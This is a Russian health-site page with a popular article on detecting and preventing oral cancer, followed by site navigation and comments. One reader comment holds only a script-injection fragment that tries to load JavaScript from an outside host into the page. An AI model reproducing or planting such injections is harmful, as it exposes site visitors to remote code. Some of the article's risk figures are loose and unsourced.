Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  5 тестов для женщин старш...  >>  5 тестов для женщин старше 40 лет. Как предотвратить рак полости рта.
 
Обратная связь
 

5 тестов для женщин старше 40 лет. Как предотвратить рак полости рта.

Размер шрифта
11 февраля 2011 00:02
  • google_analytics: false
  • Нравится

Рак полости рта совсем не так коварен, как другие онкологические заболевания: его легко самостоятельно выявить на ранних стадиях, когда недуг лечится в 90% случаев.

Проверь себя

В отличие от многих онкологических заболеваний, рак полости рта практически сразу же заявляет о себе. Уже на ранних стадиях он начинает доставлять дискомфорт. И это очень хорошо: ведь чем раньше человек обратится к врачу, тем больше шансов победить болезнь. К самым ярким симптомам относятся:

  • изменение цвета слизистой оболочки во рту на белый или красный (особенно длительное, когда «новый цвет» держится более полугода)
  • воспалительные заболевания десен, вычислить их просто: откусите яблоко, если на нем остался кровавый след – значит, есть воспаление
  • появление во рту язвочек, которые долго не заживают и легко кровоточат
  • непроходящая боль во рту (которая медленно усиливается)
  • припухлость или утолщение щеки
  • изменения в челюсти: смещение зубных рядов относительно друг друга (это ощущается, когда рот закрыт), затруднения при пережевывании пищи
  • появления налета на деснах, гландах или языке
  • изменения тембра голоса
  • неожиданное выпадение зубов
  • неприятный острый запах изо рта

Не паникуйте, если нечто подобное происходит у вас во рту. Эти симптомы, хоть и характерны для рака, еще не дают 100% гарантии того, что это именно он. Подтвердить или опровергнуть диагноз может только врач-онколог, к которому, кстати, стоит обратиться как можно скорее.

Будьте настойчивы!

Не смотря на то, что рак полости рта достаточно ярко проявляет себя уже на первых этапах болезни, в России его все равно чаще выявляют лишь на поздних стадиях. Причины, как правило, две:

  1. Сам пациент несколько лет упорно игнорирует симптомы и обращается только, когда терпеть их больше нет сил. А это происходит уже на поздних стадиях, когда позитивные результаты лечения достигаются только в 20% случав.
  2. Врачи принимают рак за другое заболевание полости рта. Пытаются вылечить не то, в итоге запуская болезнь. Это связано с тем, что врач (даже стоматолог), просто заглянув в рот, не может увидеть изменения полости, приводящие к онкологии (симптомы, описанные выше характерны для многих менее серьезных заболеваний – отсюда и путаница). Нужны специальные обследования.

Поэтому, найдя у себя начальные симптомы недуга, обязательно не просто обратитесь к врачу, но и попросите его провести полноценное обследование полости рта, включающее анализы на рак.

Особо стоит отметить, что возраст является одной из причин развития рака полости рта. Чаще всего его диагностируют у людей, старше 35-40 лет. Поэтому тем, кому за 30, желательно проходить обследования 2 раза в год. Даже если нет никаких тревожных симптомов.

Обследования

Анализы и обследования, помогающие врачам распознать рак полости рта не представляют из себя ничего сверхъестественного. Существует так называемая «система скрининга ранних предраковых и раковых заболеваний полости рта». За громоздким названием скрывается метод, который быстро и точно выявляет все очаги заболевания. При проведении этой процедуры, сначала пациент должен прополоскать рот специальным раствором, который очищает полость рта. Это необходимо для того, чтобы результаты обследования были как можно более точны. Затем полость рта исследуется с помощью специального источника света, который высвечивает зоны, в которых, возможно, начались онкологические процессы. Затем участки ротовой полости, которые вызвали подозрение, обрабатывается специальным составом, имеющим синий цвет. Спустя небольшое время, этот состав смывается. Если опухоли нет, то он вымывается полностью, а если опухоль есть – останутся синие пятна. По результатам скрининга назначаются последующие обследования, среди них могут быть биопсия (врач возьмет кусочек ткани для исследования), компьютерная томография, анализ крови и т.д.

Профилактика

Даже если обследование не выявило ничего, не расслабляйтесь. Наличие воспалительных процессов в ротовой полости повышает риск возникновения рака в несколько раз. Поэтому не забывайте о профилактике этого онкологического заболевания, тем более, что предотвратить его очень просто. К профилактическим мерам относятся:

  • ограничение употребления горячей пищи и напитков
  • отказ от курения
  • соблюдение гигиены полости рта (то есть, как минимум чистите зубы не менее 3-х минут по 3 раза в день, после еды)
  • контроль за потреблением спиртных напитков. Доказано, курение повышает риск рака на 90%, а алкоголь на 75-80%. То есть, он занимает второе место, среди факторов провоцирующих рак

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:21

Комментарий удален за нарушение Правил общения

Статьи

       
С помощью слепых крыс ученые узнали, как победить рак   Новый тест скажет, будет у вас рак или нет   Диагностика и лечение с помощью света   Почему возникает рак  
18 октября 2012Новый тест скажет, будет у вас рак или нет 09 августа 2012Раковые клетки теперь не смогут скрыться!
 
19 июля 2012Пластырь лечит рак кожи! 03 июля 2012Созданы лекарства, которые обучают организм убивать рак
 

Слайдшоу

1
Факторы, которые влияют на возникновение рака
Неожиданные симптомы рака
Супереда против рака

Тесты

Что вы знаете о раке груди?
Уход за полостью рта
Что вы знаете о ногтях?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.